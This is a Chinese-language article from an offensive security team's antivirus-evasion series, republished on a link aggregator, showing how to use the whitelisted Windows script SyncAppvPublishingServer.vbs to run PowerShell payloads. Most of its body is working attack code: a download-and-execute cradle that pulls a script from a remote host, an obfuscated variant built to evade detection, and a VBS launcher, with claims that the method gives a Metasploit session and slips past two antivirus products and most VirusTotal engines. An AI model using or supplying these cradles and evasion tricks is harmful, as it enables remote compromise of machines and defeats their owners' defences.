远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload
source link: http://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA%3D%3D&%3Bmid=2247486122&%3Bidx=1&%3Bsn=7cf84e8fda23dd01168f58e88af7e71d
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
声明: Tide安全团队原创文章,转载请声明出处! 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载: https://github.com/TideSec/BypassAntiVirus
一、SyncAppvPublishingServer 简介
Windows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。
二、SyncAppvPublishingServer 使用
在powershell下执行
SyncAppvPublishingServer.vbs break;powershell代码
测试过程中使用的是SyncAppvPublishingServer.vbs,SyncAppvPublishingServer.exe 没有成功
在cmd里是无法执行powershell命令的
该命令需要在powershell里进行执行
因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。
三、SyncAppvPublishingServer 执行payload
使用powershell木马。
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
将powershell脚本进行混淆使用IEX远程加载执行payload。
$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)
msf可正常上线。
在实战中也可以直接写成vbs脚本 run.vbs
Set oShell=WScript.CreateObject("WScript.Shell")
oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
点击run.vbs也可以正常上线。
火绒、360均没有检测出
放在virustotal.com上a.bat查杀率为1/56
四、参考资料
Powershell Without Powershell.exe
https://www.youtube.com/watch?v=sema3EYnP2c
guān
zhù
wǒ
men
Tide安全团队正式成立于2019年1月 , 是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
对安全感兴趣的小伙伴可以 关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK